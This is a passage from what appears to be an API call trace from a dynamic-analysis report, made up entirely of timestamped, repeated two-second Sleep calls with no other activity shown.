(dwMilliseconds=0x7d0) [0147.975] Sleep (dwMilliseconds=0x7d0) [0148.012] Sleep (dwMilliseconds=0x7d0) [0148.052] Sleep (dwMilliseconds=0x7d0) [0148.088] Sleep (dwMilliseconds=0x7d0) [0148.110] Sleep (dwMilliseconds=0x7d0) [0148.131] Sleep (dwMilliseconds=0x7d0) [0148.167] Sleep (dwMilliseconds=0x7d0) [0148.205] Sleep (dwMilliseconds=0x7d0) [0148.239] Sleep (dwMilliseconds=0x7d0) [0148.248] Sleep (dwMilliseconds=0x7d0) [0148.284] Sleep (dwMilliseconds=0x7d0) [0148.324] Sleep (dwMilliseconds=0x7d0) [0148.505] Sleep (dwMilliseconds=0x7d0) [0148.584] Sleep (dwMilliseconds=0x7d0) [0148.698] Sleep (dwMilliseconds=0x7d0) [0148.738] Sleep (dwMilliseconds=0x7d0) [0148.782] Sleep (dwMilliseconds=0x7d0) [0148.823] Sleep (dwMilliseconds=0x7d0) [0148.837] Sleep (dwMilliseconds=0x7d0) [0148.869] Sleep (dwMilliseconds=0x7d0) [0148.909] Sleep (dwMilliseconds=0x7d0) [0148.947] Sleep (dwMilliseconds=0x7d0) [0148.985] Sleep (dwMilliseconds=0x7d0) [0148.999] Sleep (dwMilliseconds=0x7d0) [0149.024] Sleep (dwMilliseconds=0x7d0) [0149.062] Sleep (dwMilliseconds=0x7d0) [0149.102] Sleep (dwMilliseconds=0x7d0) [0149.140] Sleep (dwMilliseconds=0x7d0) [0149.146] Sleep (dwMilliseconds=0x7d0) [0149.238] Sleep (dwMilliseconds=0x7d0) [0149.276] Sleep (dwMilliseconds=0x7d0) [0149.313] Sleep (dwMilliseconds=0x7d0) [0149.391] Sleep (dwMilliseconds=0x7d0) [0149.694] Sleep (dwMilliseconds=0x7d0) [0149.740] Sleep (dwMilliseconds=0x7d0) [0149.779] Sleep (dwMilliseconds=0x7d0) [0149.817] Sleep (dwMilliseconds=0x7d0) [0149.849] Sleep (dwMilliseconds=0x7d0) [0149.858] Sleep (dwMilliseconds=0x7d0) [0149.897] Sleep (dwMilliseconds=0x7d0) [0149.935] Sleep (dwMilliseconds=0x7d0) [0149.976] Sleep (dwMilliseconds=0x7d0) [0150.011] Sleep (dwMilliseconds=0x7d0) [0150.038] Sleep (dwMilliseconds=0x7d0) [0150.074] Sleep (dwMilliseconds=0x7d0) [0150.112] Sleep (dwMilliseconds=0x7d0) [0150.228] Sleep (dwMilliseconds=0x7d0) [0150.314] Sleep (dwMilliseconds=0x7d0) [0150.412] Sleep (dwMilliseconds=0x7d0) [0150.479] Sleep (dwMilliseconds=0x7d0) [0150.519] Sleep (dwMilliseconds=0x7d0) [0150.556] Sleep (dwMilliseconds=0x7d0) [0150.575] Sleep (dwMilliseconds=0x7d0) [0150.626] Sleep (dwMilliseconds=0x7d0) [0150.803] Sleep (dwMilliseconds=0x7d0) [0150.848] Sleep (dwMilliseconds=0x7d0) [0150.887] Sleep (dwMilliseconds=0x7d0) [0150.924] Sleep (dwMilliseconds=0x7d0) [0150.955] Sleep (dwMilliseconds=0x7d0) [0150.959] Sleep (dwMilliseconds=0x7d0) [0150.989] Sleep (dwMilliseconds=0x7d0) [0151.031] Sleep (dwMilliseconds=0x7d0) [0151.067] Sleep (dwMilliseconds=0x7d0) [0151.153] Sleep (dwMilliseconds=0x7d0) [0151.169] Sleep (dwMilliseconds=0x7d0) [0151.194] Sleep (dwMilliseconds=0x7d0) [0151.239] Sleep (dwMilliseconds=0x7d0) [0151.278] Sleep (dwMilliseconds=0x7d0) [0151.297] Sleep (dwMilliseconds=0x7d0) [0151.315] Sleep (dwMilliseconds=0x7d0) [0151.351] Sleep (dwMilliseconds=0x7d0) [0151.388] Sleep (dwMilliseconds=0x7d0) [0151.410] Sleep (dwMilliseconds=0x7d0) [0151.620] Sleep (dwMilliseconds=0x7d0) [0151.772] Sleep (dwMilliseconds=0x7d0) [0151.890] Sleep (dwMilliseconds=0x7d0) [0151.936] Sleep (dwMilliseconds=0x7d0) [0151.942] Sleep (dwMilliseconds=0x7d0) [0152.122] Sleep (dwMilliseconds=0x7d0) [0152.161] Sleep (dwMilliseconds=0x7d0) [0152.200] Sleep (dwMilliseconds=0x7d0) [0152.249] Sleep (dwMilliseconds=0x7d0) [0152.259] Sleep (dwMilliseconds=0x7d0) [0152.396] Sleep (dwMilliseconds=0x7d0) [0152.445] Sleep (dwMilliseconds=0x7d0) [0152.481] Sleep (dwMilliseconds=0x7d0) [0152.518] Sleep (dwMilliseconds=0x7d0) [0152.537] Sleep (dwMilliseconds=0x7d0) [0152.697] Sleep (dwMilliseconds=0x7d0) [0152.736] Sleep (dwMilliseconds=0x7d0) [0152.775] Sleep (dwMilliseconds=0x7d0) [0152.812] Sleep (dwMilliseconds=0x7d0) [0152.854] Sleep (dwMilliseconds=0x7d0) [0152.894] Sleep (dwMilliseconds=0x7d0) [0152.933] Sleep (dwMilliseconds=0x7d0) [0152.971] Sleep (dwMilliseconds=0x7d0) [0153.010] Sleep (dwMilliseconds=0x7d0) [0153.055] Sleep (dwMilliseconds=0x7d0) [0153.092] Sleep (dwMilliseconds=0x7d0) [0153.131] Sleep (dwMilliseconds=0x7d0) [0153.135] Sleep (dwMilliseconds=0x7d0) [0153.305] Sleep (dwMilliseconds=0x7d0) [0153.425] Sleep (dwMilliseconds=0x7d0) [0153.472] Sleep (dwMilliseconds=0x7d0) [0153.482] Sleep (dwMilliseconds=0x7d0) [0153.548] Sleep (dwMilliseconds=0x7d0) [0153.625] Sleep (dwMilliseconds=0x7d0) [0153.663] Sleep (dwMilliseconds=0x7d0) [0153.684] Sleep (dwMilliseconds=0x7d0) [0153.709] Sleep (dwMilliseconds=0x7d0) [0153.747] Sleep (dwMilliseconds=0x7d0) [0153.786] Sleep (dwMilliseconds=0x7d0) [0153.821] Sleep (dwMilliseconds=0x7d0) [0153.867] Sleep (dwMilliseconds=0x7d0) [0153.905] Sleep (dwMilliseconds=0x7d0) [0154.001] Sleep (dwMilliseconds=0x7d0) [0154.091] Sleep (dwMilliseconds=0x7d0) [0154.116] Sleep (dwMilliseconds=0x7d0) [0154.132] Sleep (dwMilliseconds=0x7d0) [0154.170] Sleep (dwMilliseconds=0x7d0) [0154.209] Sleep (dwMilliseconds=0x7d0) [0154.240] Sleep (dwMilliseconds=0x7d0) [0154.251] Sleep (dwMilliseconds=0x7d0) [0154.287] Sleep (dwMilliseconds=0x7d0) [0154.324] Sleep (dwMilliseconds=0x7d0) [0154.356] Sleep (dwMilliseconds=0x7d0) [0154.370] Sleep (dwMilliseconds=0x7d0) [0154.547] Sleep (dwMilliseconds=0x7d0) [0154.679] Sleep (dwMilliseconds=0x7d0) [0154.718] Sleep (dwMilliseconds=0x7d0) [0154.723] Sleep (dwMilliseconds=0x7d0) [0154.776] Sleep (dwMilliseconds=0x7d0) [0154.816] Sleep (dwMilliseconds=0x7d0) [0154.853] Sleep (dwMilliseconds=0x7d0) [0154.981] Sleep (dwMilliseconds=0x7d0) [0155.207] Sleep (dwMilliseconds=0x7d0) [0155.245] Sleep (dwMilliseconds=0x7d0) [0155.284] Sleep (dwMilliseconds=0x7d0) [0155.322] Sleep (dwMilliseconds=0x7d0) [0155.353] Sleep (dwMilliseconds=0x7d0) [0155.370] Sleep (dwMilliseconds=0x7d0) [0155.406] Sleep (dwMilliseconds=0x7d0) [0155.449] Sleep (dwMilliseconds=0x7d0) [0155.477] Sleep (dwMilliseconds=0x7d0) [0155.496] Sleep (dwMilliseconds=0x7d0) [0155.535] Sleep (dwMilliseconds=0x7d0) [0155.596] Sleep (dwMilliseconds=0x7d0) [0155.631] Sleep (dwMilliseconds=0x7d0) [0155.647] Sleep (dwMilliseconds=0x7d0) [0155.684] Sleep (dwMilliseconds=0x7d0) [0155.727] Sleep (dwMilliseconds=0x7d0) [0155.766] Sleep (dwMilliseconds=0x7d0) [0155.786] Sleep (dwMilliseconds=0x7d0) [0156.000] Sleep (dwMilliseconds=0x7d0) [0156.048] Sleep (dwMilliseconds=0x7d0) [0156.091] Sleep (dwMilliseconds=0x7d0) [0156.109] Sleep (dwMilliseconds=0x7d0) [0156.133] Sleep (dwMilliseconds=0x7d0) [0156.180] Sleep (dwMilliseconds=0x7d0) [0156.222] Sleep (dwMilliseconds=0x7d0) [0156.259] Sleep (dwMilliseconds=0x7d0) [0156.270] Sleep (dwMilliseconds=0x7d0) [0156.302] Sleep (dwMilliseconds=0x7d0) [0156.339] Sleep (dwMilliseconds=0x7d0) [0156.377] Sleep (dwMilliseconds=0x7d0) [0156.417] Sleep (dwMilliseconds=0x7d0) [0156.430] Sleep (dwMilliseconds=0x7d0) [0156.530] Sleep (dwMilliseconds=0x7d0) [0156.593] Sleep (dwMilliseconds=0x7d0) [0156.630] Sleep (dwMilliseconds=0x7d0) [0156.669] Sleep (dwMilliseconds=0x7d0) [0156.683] Sleep (dwMilliseconds=0x7d0) [0156.713] Sleep (dwMilliseconds=0x7d0) [0156.750] Sleep (dwMilliseconds=0x7d0) [0156.789] Sleep (dwMilliseconds=0x7d0) [0156.827] Sleep (dwMilliseconds=0x7d0) [0156.838] Sleep (dwMilliseconds=0x7d0) [0156.989] Sleep (dwMilliseconds=0x7d0) [0157.228] Sleep (dwMilliseconds=0x7d0) [0157.268] Sleep (dwMilliseconds=0x7d0) [0157.301] Sleep (dwMilliseconds=0x7d0) [0157.313] Sleep (dwMilliseconds=0x7d0) [0157.359] Sleep (dwMilliseconds=0x7d0) [0157.401] Sleep (dwMilliseconds=0x7d0) [0157.450] Sleep (dwMilliseconds=0x7d0) [0157.476] Sleep (dwMilliseconds=0x7d0) [0157.529] Sleep (dwMilliseconds=0x7d0) [0157.805] Sleep (dwMilliseconds=0x7d0) [0157.843] Sleep (dwMilliseconds=0x7d0) [0157.882] Sleep (dwMilliseconds=0x7d0) [0157.906] Sleep (dwMilliseconds=0x7d0) [0157.924] Sleep (dwMilliseconds=0x7d0) [0157.965] Sleep (dwMilliseconds=0x7d0) [0158.002] Sleep (dwMilliseconds=0x7d0) [0158.042] Sleep (dwMilliseconds=0x7d0) [0158.112] Sleep (dwMilliseconds=0x7d0) [0158.189] Sleep (dwMilliseconds=0x7d0) [0158.303] Sleep (dwMilliseconds=0x7d0) [0158.376] Sleep (dwMilliseconds=0x7d0) [0158.410] Sleep (dwMilliseconds=0x7d0) [0158.426] Sleep (dwMilliseconds=0x7d0) [0158.471] Sleep (dwMilliseconds=0x7d0) [0158.507] Sleep (dwMilliseconds=0x7d0) [0158.540] Sleep (dwMilliseconds=0x7d0) [0158.546] Sleep (dwMilliseconds=0x7d0) [0158.605] Sleep (dwMilliseconds=0x7d0) [0158.643] Sleep (dwMilliseconds=0x7d0) [0158.677] Sleep (dwMilliseconds=0x7d0) [0158.681] Sleep (dwMilliseconds=0x7d0) [0158.717] Sleep (dwMilliseconds=0x7d0) [0158.753] Sleep (dwMilliseconds=0x7d0) [0158.827] Sleep (dwMilliseconds=0x7d0) [0158.834] Sleep (dwMilliseconds=0x7d0) [0158.870] Sleep (dwMilliseconds=0x7d0) [0158.982] Sleep (dwMilliseconds=0x7d0) [0159.063] Sleep (dwMilliseconds=0x7d0) [0159.113] Sleep (dwMilliseconds=0x7d0) [0159.150] Sleep (dwMilliseconds=0x7d0) [0159.186] Sleep (dwMilliseconds=0x7d0) [0159.218] Sleep (dwMilliseconds=0x7d0) [0159.226] Sleep (dwMilliseconds=0x7d0) [0159.264] Sleep (dwMilliseconds=0x7d0) [0159.300] Sleep (dwMilliseconds=0x7d0) [0159.339] Sleep (dwMilliseconds=0x7d0) [0159.354] Sleep (dwMilliseconds=0x7d0) [0159.380] Sleep (dwMilliseconds=0x7d0) [0159.418] Sleep (dwMilliseconds=0x7d0) [0159.468] Sleep (dwMilliseconds=0x7d0) [0159.498] Sleep (dwMilliseconds=0x7d0) [0159.628] Sleep (dwMilliseconds=0x7d0) [0159.666] Sleep (dwMilliseconds=0x7d0) [0159.702] Sleep (dwMilliseconds=0x7d0) [0159.730] Sleep (dwMilliseconds=0x7d0) [0159.794] Sleep (dwMilliseconds=0x7d0) [0159.841] Sleep (dwMilliseconds=0x7d0) [0159.885] Sleep (dwMilliseconds=0x7d0) [0159.920] Sleep (dwMilliseconds=0x7d0) [0159.935] Sleep (dwMilliseconds=0x7d0) [0159.972] Sleep (dwMilliseconds=0x7d0) [0160.026] Sleep (dwMilliseconds=0x7d0) [0160.709] Sleep (dwMilliseconds=0x7d0) [0160.946] Sleep (dwMilliseconds=0x7d0) [0161.057] Sleep (dwMilliseconds=0x7d0) [0161.105] Sleep (dwMilliseconds=0x7d0) [0161.176] Sleep (dwMilliseconds=0x7d0) [0161.190] Sleep (dwMilliseconds=0x7d0) [0161.233] Sleep (dwMilliseconds=0x7d0) [0161.303] Sleep (dwMilliseconds=0x7d0) [0161.393] Sleep (dwMilliseconds=0x7d0) [0161.443] Sleep (dwMilliseconds=0x7d0) [0161.468] Sleep (dwMilliseconds=0x7d0) [0161.556] Sleep (dwMilliseconds=0x7d0) [0161.646] Sleep (dwMilliseconds=0x7d0) [0161.722] Sleep (dwMilliseconds=0x7d0) [0161.760] Sleep (dwMilliseconds=0x7d0) [0161.814] Sleep (dwMilliseconds=0x7d0) [0161.866] Sleep (dwMilliseconds=0x7d0) [0161.909] Sleep (dwMilliseconds=0x7d0) [0161.950] Sleep (dwMilliseconds=0x7d0) [0161.977] Sleep (dwMilliseconds=0x7d0) [0162.036] Sleep (dwMilliseconds=0x7d0) [0162.072] Sleep (dwMilliseconds=0x7d0) [0162.110] Sleep (dwMilliseconds=0x7d0) [0162.160] Sleep (dwMilliseconds=0x7d0) [0162.263] Sleep (dwMilliseconds=0x7d0) [0162.342] Sleep (dwMilliseconds=0x7d0) [0162.495] Sleep (dwMilliseconds=0x7d0) [0162.534] Sleep (dwMilliseconds=0x7d0) [0162.563] Sleep (dwMilliseconds=0x7d0) [0162.577] Sleep (dwMilliseconds=0x7d0) [0162.615] Sleep (dwMilliseconds=0x7d0) [0162.691] Sleep (dwMilliseconds=0x7d0) [0162.731] Sleep (dwMilliseconds=0x7d0) [0162.742] Sleep (dwMilliseconds=0x7d0) [0162.914] Sleep (dwMilliseconds=0x7d0) [0163.033] Sleep (dwMilliseconds=0x7d0) [0163.072] Sleep (dwMilliseconds=0x7d0) [0163.091] Sleep (dwMilliseconds=0x7d0) [0163.114] Sleep (dwMilliseconds=0x7d0) [0163.166] Sleep (dwMilliseconds=0x7d0) [0163.238] Sleep (dwMilliseconds=0x7d0) [0163.260] Sleep (dwMilliseconds=0x7d0) [0163.278] Sleep (dwMilliseconds=0x7d0) [0163.320] Sleep (dwMilliseconds=0x7d0) [0163.356] Sleep (dwMilliseconds=0x7d0) [0163.374] Sleep (dwMilliseconds=0x7d0) [0163.396] Sleep (dwMilliseconds=0x7d0) [0163.434] Sleep (dwMilliseconds=0x7d0) [0163.471] Sleep (dwMilliseconds=0x7d0) [0163.485] Sleep (dwMilliseconds=0x7d0) [0163.512] Sleep (dwMilliseconds=0x7d0) [0163.550] Sleep (dwMilliseconds=0x7d0) [0163.587] Sleep (dwMilliseconds=0x7d0) [0163.601] Sleep (dwMilliseconds=0x7d0) [0163.635] Sleep (dwMilliseconds=0x7d0) [0163.671] Sleep (dwMilliseconds=0x7d0) [0163.726] Sleep (dwMilliseconds=0x7d0) [0163.739] Sleep (dwMilliseconds=0x7d0) [0163.765] Sleep (dwMilliseconds=0x7d0) [0163.801] Sleep (dwMilliseconds=0x7d0) [0163.837] Sleep (dwMilliseconds=0x7d0) [0163.845] Sleep (dwMilliseconds=0x7d0) [0163.875] Sleep (dwMilliseconds=0x7d0) [0163.911] Sleep (dwMilliseconds=0x7d0) [0163.952] Sleep (dwMilliseconds=0x7d0) [0163.962] Sleep (dwMilliseconds=0x7d0) [0163.995] Sleep (dwMilliseconds=0x7d0) [0164.034] Sleep (dwMilliseconds=0x7d0) [0164.077] Sleep (dwMilliseconds=0x7d0) [0164.095] Sleep (dwMilliseconds=0x7d0) [0164.120] Sleep (dwMilliseconds=0x7d0) [0164.178] Sleep (dwMilliseconds=0x7d0) [0164.297] Sleep (dwMilliseconds=0x7d0) [0164.433] Sleep (dwMilliseconds=0x7d0) [0164.452] Sleep (dwMilliseconds=0x7d0) [0164.496] Sleep (dwMilliseconds=0x7d0) [0164.532] Sleep (dwMilliseconds=0x7d0) [0164.564] Sleep (dwMilliseconds=0x7d0) [0164.572] Sleep (dwMilliseconds=0x7d0) [0164.607] Sleep (dwMilliseconds=0x7d0) [0164.653] Sleep (dwMilliseconds=0x7d0) [0164.691] Sleep (dwMilliseconds=0x7d0) [0164.697] Sleep (dwMilliseconds=0x7d0) [0164.735] Sleep (dwMilliseconds=0x7d0) [0164.774] Sleep (dwMilliseconds=0x7d0) [0164.815] Sleep (dwMilliseconds=0x7d0) [0164.892] Sleep (dwMilliseconds=0x7d0) [0165.008] Sleep (dwMilliseconds=0x7d0) [0165.104] Sleep (dwMilliseconds=0x7d0) [0165.158] Sleep (dwMilliseconds=0x7d0) [0165.180] Sleep (dwMilliseconds=0x7d0) [0165.199] Sleep (dwMilliseconds=0x7d0) [0165.237] Sleep (dwMilliseconds=0x7d0) [0165.275] Sleep (dwMilliseconds=0x7d0) [0165.308] Sleep (dwMilliseconds=0x7d0) [0165.318] Sleep (dwMilliseconds=0x7d0) [0165.354] Sleep (dwMilliseconds=0x7d0) [0165.390] Sleep (dwMilliseconds=0x7d0) [0165.426] Sleep (dwMilliseconds=0x7d0) [0165.435] Sleep (dwMilliseconds=0x7d0) [0165.473] Sleep (dwMilliseconds=0x7d0) [0165.511] Sleep (dwMilliseconds=0x7d0) [0165.554] Sleep (dwMilliseconds=0x7d0) [0165.797] Sleep (dwMilliseconds=0x7d0) [0165.817] Sleep (dwMilliseconds=0x7d0) [0165.854] Sleep (dwMilliseconds=0x7d0) [0165.891] Sleep (dwMilliseconds=0x7d0) [0165.915] Sleep (dwMilliseconds=0x7d0) [0165.932] Sleep (dwMilliseconds=0x7d0) [0165.969] Sleep (dwMilliseconds=0x7d0) [0166.006] Sleep (dwMilliseconds=0x7d0) [0166.044] Sleep (dwMilliseconds=0x7d0) [0166.049] Sleep (dwMilliseconds=0x7d0) [0166.085] Sleep (dwMilliseconds=0x7d0) [0166.125] Sleep (dwMilliseconds=0x7d0) [0166.189] Sleep (dwMilliseconds=0x7d0) [0166.210] Sleep (dwMilliseconds=0x7d0) [0166.246] Sleep (dwMilliseconds=0x7d0) [0166.425] Sleep (dwMilliseconds=0x7d0) [0166.516] Sleep (dwMilliseconds=0x7d0) [0166.544] Sleep (dwMilliseconds=0x7d0) [0166.555] Sleep (dwMilliseconds=0x7d0) [0166.598] Sleep (dwMilliseconds=0x7d0) [0166.648] Sleep (dwMilliseconds=0x7d0) [0166.685] Sleep (dwMilliseconds=0x7d0) [0166.719] Sleep (dwMilliseconds=0x7d0) [0166.740] Sleep (dwMilliseconds=0x7d0) [0166.777] Sleep (dwMilliseconds=0x7d0) [0166.814] Sleep (dwMilliseconds=0x7d0) [0166.888] Sleep (dwMilliseconds=0x7d0) [0166.924] Sleep (dwMilliseconds=0x7d0) [0166.929] Sleep (dwMilliseconds=0x7d0) [0166.964] Sleep (dwMilliseconds=0x7d0) [0167.004] Sleep (dwMilliseconds=0x7d0) [0167.044] Sleep (dwMilliseconds=0x7d0) [0167.081] Sleep (dwMilliseconds=0x7d0) [0167.084] Sleep (dwMilliseconds=0x7d0) [0167.123] Sleep (dwMilliseconds=0x7d0) [0167.175] Sleep (dwMilliseconds=0x7d0) [0167.213] Sleep (dwMilliseconds=0x7d0) [0167.232] Sleep (dwMilliseconds=0x7d0) [0167.254] Sleep (dwMilliseconds=0x7d0) [0167.290] Sleep (dwMilliseconds=0x7d0) [0167.326] Sleep (dwMilliseconds=0x7d0) [0167.359] Sleep (dwMilliseconds=0x7d0) [0167.460] Sleep (dwMilliseconds=0x7d0) [0167.586] Sleep (dwMilliseconds=0x7d0) [0167.632] Sleep (dwMilliseconds=0x7d0) [0167.667] Sleep (dwMilliseconds=0x7d0) [0167.682] Sleep (dwMilliseconds=0x7d0) [0167.718] Sleep (dwMilliseconds=0x7d0) [0167.754] Sleep (dwMilliseconds=0x7d0) [0167.790] Sleep (dwMilliseconds=0x7d0) [0167.793] Sleep (dwMilliseconds=0x7d0) [0167.831] Sleep (dwMilliseconds=0x7d0) [0167.868] Sleep (dwMilliseconds=0x7d0) [0167.906] Sleep (dwMilliseconds=0x7d0) [0167.915] Sleep (dwMilliseconds=0x7d0) [0167.948] Sleep (dwMilliseconds=0x7d0) [0167.985] Sleep (dwMilliseconds=0x7d0) [0168.022] Sleep (dwMilliseconds=0x7d0) [0168.089] Sleep (dwMilliseconds=0x7d0) [0168.097] Sleep (dwMilliseconds=0x7d0) [0168.154] Sleep (dwMilliseconds=0x7d0) [0168.199] Sleep (dwMilliseconds=0x7d0) [0168.238] Sleep (dwMilliseconds=0x7d0) [0168.266] Sleep (dwMilliseconds=0x7d0) [0168.382] Sleep (dwMilliseconds=0x7d0) [0168.540] Sleep (dwMilliseconds=0x7d0) [0168.579] Sleep (dwMilliseconds=0x7d0) [0168.615] Sleep (dwMilliseconds=0x7d0) [0168.620] Sleep (dwMilliseconds=0x7d0) [0168.664] Sleep (dwMilliseconds=0x7d0) [0168.701] Sleep (dwMilliseconds=0x7d0) [0168.739] Sleep (dwMilliseconds=0x7d0) [0168.756] Sleep (dwMilliseconds=0x7d0) [0168.789] Sleep (dwMilliseconds=0x7d0) [0168.826] Sleep (dwMilliseconds=0x7d0) [0168.863] Sleep (dwMilliseconds=0x7d0) [0168.895] Sleep (dwMilliseconds=0x7d0) [0168.907] Sleep (dwMilliseconds=0x7d0) [0168.945] Sleep (dwMilliseconds=0x7d0) [0168.982] Sleep (dwMilliseconds=0x7d0) [0169.021] Sleep (dwMilliseconds=0x7d0) [0169.047] Sleep (dwMilliseconds=0x7d0) [0169.059] Sleep (dwMilliseconds=0x7d0) [0169.098] Sleep (dwMilliseconds=0x7d0) [0169.154] Sleep (dwMilliseconds=0x7d0) [0169.191] Sleep (dwMilliseconds=0x7d0) [0169.201] Sleep (dwMilliseconds=0x7d0) [0169.280] Sleep (dwMilliseconds=0x7d0) [0169.492] Sleep (dwMilliseconds=0x7d0) [0169.530] Sleep (dwMilliseconds=0x7d0) [0169.565] Sleep (dwMilliseconds=0x7d0) [0169.575] Sleep (dwMilliseconds=0x7d0) [0169.613] Sleep (dwMilliseconds=0x7d0) [0169.659] Sleep (dwMilliseconds=0x7d0) [0169.699] Sleep (dwMilliseconds=0x7d0) [0169.736] Sleep (dwMilliseconds=0x7d0) [0169.753] Sleep (dwMilliseconds=0x7d0) [0169.792] Sleep (dwMilliseconds=0x7d0) [0169.833] Sleep (dwMilliseconds=0x7d0) [0169.870] Sleep (dwMilliseconds=0x7d0) [0169.909] Sleep (dwMilliseconds=0x7d0) [0169.920] Sleep (dwMilliseconds=0x7d0) [0169.955] Sleep (dwMilliseconds=0x7d0) [0169.995] Sleep (dwMilliseconds=0x7d0) [0170.032] Sleep (dwMilliseconds=0x7d0) [0170.071] Sleep (dwMilliseconds=0x7d0) [0170.195] Sleep (dwMilliseconds=0x7d0) [0170.299] Sleep (dwMilliseconds=0x7d0) [0170.410] Sleep (dwMilliseconds=0x7d0) [0170.493] Sleep (dwMilliseconds=0x7d0) [0170.551] Sleep (dwMilliseconds=0x7d0) [0170.573] Sleep (dwMilliseconds=0x7d0) [0170.607] Sleep (dwMilliseconds=0x7d0) [0170.678] Sleep (dwMilliseconds=0x7d0) [0170.757] Sleep (dwMilliseconds=0x7d0) [0170.812] Sleep (dwMilliseconds=0x7d0) [0170.850] Sleep (dwMilliseconds=0x7d0) [0170.916] Sleep (dwMilliseconds=0x7d0) [0170.954] Sleep (dwMilliseconds=0x7d0) [0171.055] Sleep (dwMilliseconds=0x7d0) [0171.095] Sleep (dwMilliseconds=0x7d0) [0171.136] Sleep (dwMilliseconds=0x7d0) [0171.195] Sleep (dwMilliseconds=0x7d0) [0171.235] Sleep (dwMilliseconds=0x7d0) [0171.238] Sleep (dwMilliseconds=0x7d0) [0171.277] Sleep (dwMilliseconds=0x7d0) [0171.315] Sleep (dwMilliseconds=0x7d0) [0171.355] Sleep (dwMilliseconds=0x7d0) [0171.392] Sleep (dwMilliseconds=0x7d0) [0171.411] Sleep (dwMilliseconds=0x7d0) [0171.437] Sleep (dwMilliseconds=0x7d0) [0171.474] Sleep (dwMilliseconds=0x7d0) [0171.517] Sleep (dwMilliseconds=0x7d0) [0171.553] Sleep (dwMilliseconds=0x7d0) [0171.578] Sleep (dwMilliseconds=0x7d0) [0171.596] Sleep (dwMilliseconds=0x7d0) [0171.681] Sleep (dwMilliseconds=0x7d0) [0171.719] Sleep (dwMilliseconds=0x7d0) [0171.757] Sleep (dwMilliseconds=0x7d0) [0171.793] Sleep (dwMilliseconds=0x7d0) [0171.800] Sleep (dwMilliseconds=0x7d0) [0171.836] Sleep (dwMilliseconds=0x7d0) [0171.874] Sleep (dwMilliseconds=0x7d0) [0171.914] Sleep (dwMilliseconds=0x7d0) [0171.948] Sleep (dwMilliseconds=0x7d0) [0171.954] Sleep (dwMilliseconds=0x7d0) [0171.991] Sleep (dwMilliseconds=0x7d0) [0172.029] Sleep (dwMilliseconds=0x7d0) [0172.128] Sleep (dwMilliseconds=0x7d0) [0172.266] Sleep (dwMilliseconds=0x7d0) [0172.315] Sleep (dwMilliseconds=0x7d0) [0172.427] Sleep (dwMilliseconds=0x7d0) [0172.466] Sleep (dwMilliseconds=0x7d0) [0172.509] Sleep (dwMilliseconds=0x7d0) [0172.543] Sleep (dwMilliseconds=0x7d0) [0172.550] Sleep (dwMilliseconds=0x7d0) [0172.578] Sleep (dwMilliseconds=0x7d0) [0172.614] Sleep (dwMilliseconds=0x7d0) [0172.661] Sleep (dwMilliseconds=0x7d0) [0172.698] Sleep (dwMilliseconds=0x7d0) [0172.724] Sleep (dwMilliseconds=0x7d0) [0172.742] Sleep (dwMilliseconds=0x7d0) [0172.779] Sleep (dwMilliseconds=0x7d0) [0172.852] Sleep (dwMilliseconds=0x7d0) [0172.893] Sleep (dwMilliseconds=0x7d0) [0172.915] Sleep (dwMilliseconds=0x7d0) [0173.025] Sleep (dwMilliseconds=0x7d0) [0173.179] Sleep (dwMilliseconds=0x7d0) [0173.224] Sleep (dwMilliseconds=0x7d0) [0173.279] Sleep (dwMilliseconds=0x7d0) [0173.308] Sleep (dwMilliseconds=0x7d0) [0173.351] Sleep (dwMilliseconds=0x7d0) [0173.389] Sleep (dwMilliseconds=0x7d0) [0173.428] Sleep (dwMilliseconds=0x7d0) [0173.450] Sleep (dwMilliseconds=0x7d0) [0173.479] Sleep (dwMilliseconds=0x7d0) [0173.520] Sleep (dwMilliseconds=0x7d0) [0173.559] Sleep (dwMilliseconds=0x7d0) [0173.597] Sleep (dwMilliseconds=0x7d0) [0173.608] Sleep (dwMilliseconds=0x7d0) [0173.648] Sleep (dwMilliseconds=0x7d0) [0173.687] Sleep (dwMilliseconds=0x7d0) [0173.726] Sleep (dwMilliseconds=0x7d0) [0173.759] Sleep (dwMilliseconds=0x7d0) [0173.774] Sleep (dwMilliseconds=0x7d0) [0173.813] Sleep (dwMilliseconds=0x7d0) [0173.849] Sleep (dwMilliseconds=0x7d0) [0173.880] Sleep (dwMilliseconds=0x7d0) [0173.890] Sleep (dwMilliseconds=0x7d0) [0173.930] Sleep (dwMilliseconds=0x7d0) [0173.967] Sleep (dwMilliseconds=0x7d0) [0174.041] Sleep (dwMilliseconds=0x7d0) [0174.083] Sleep (dwMilliseconds=0x7d0) [0174.215] Sleep (dwMilliseconds=0x7d0) [0174.393] Sleep (dwMilliseconds=0x7d0) [0174.432] Sleep (dwMilliseconds=0x7d0) [0174.469] Sleep (dwMilliseconds=0x7d0) [0174.479] Sleep (dwMilliseconds=0x7d0) [0174.514] Sleep (dwMilliseconds=0x7d0) [0174.589] Sleep (dwMilliseconds=0x7d0) [0174.636] Sleep (dwMilliseconds=0x7d0) [0174.650] Sleep (dwMilliseconds=0x7d0) [0174.677] Sleep (dwMilliseconds=0x7d0) [0174.716] Sleep (dwMilliseconds=0x7d0) [0174.756] Sleep (dwMilliseconds=0x7d0) [0174.792] Sleep (dwMilliseconds=0x7d0) [0174.813] Sleep (dwMilliseconds=0x7d0) [0174.838] Sleep (dwMilliseconds=0x7d0) [0174.886] Sleep (dwMilliseconds=0x7d0) [0174.933] Sleep (dwMilliseconds=0x7d0) [0175.105] Sleep (dwMilliseconds=0x7d0) [0175.123] Sleep (dwMilliseconds=0x7d0) [0175.151] Sleep (dwMilliseconds=0x7d0) [0175.241] Sleep (dwMilliseconds=0x7d0) [0175.281] Sleep (dwMilliseconds=0x7d0) [0175.310] Sleep (dwMilliseconds=0x7d0) [0175.323] Sleep (dwMilliseconds=0x7d0) [0175.378] Sleep (dwMilliseconds=0x7d0) [0175.426] Sleep (dwMilliseconds=0x7d0) [0175.463] Sleep (dwMilliseconds=0x7d0) [0175.501] Sleep (dwMilliseconds=0x7d0) [0175.538] Sleep (dwMilliseconds=0x7d0) [0175.554] Sleep (dwMilliseconds=0x7d0) [0175.649] Sleep (dwMilliseconds=0x7d0) [0175.688] Sleep (dwMilliseconds=0x7d0) [0175.724] Sleep (dwMilliseconds=0x7d0) [0175.761] Sleep (dwMilliseconds=0x7d0) [0175.769] Sleep (dwMilliseconds=0x7d0) [0175.806] Sleep (dwMilliseconds=0x7d0) [0175.843] Sleep (dwMilliseconds=0x7d0) [0175.883] Sleep (dwMilliseconds=0x7d0) [0175.914] Sleep (dwMilliseconds=0x7d0) [0175.924] Sleep (dwMilliseconds=0x7d0) [0175.961] 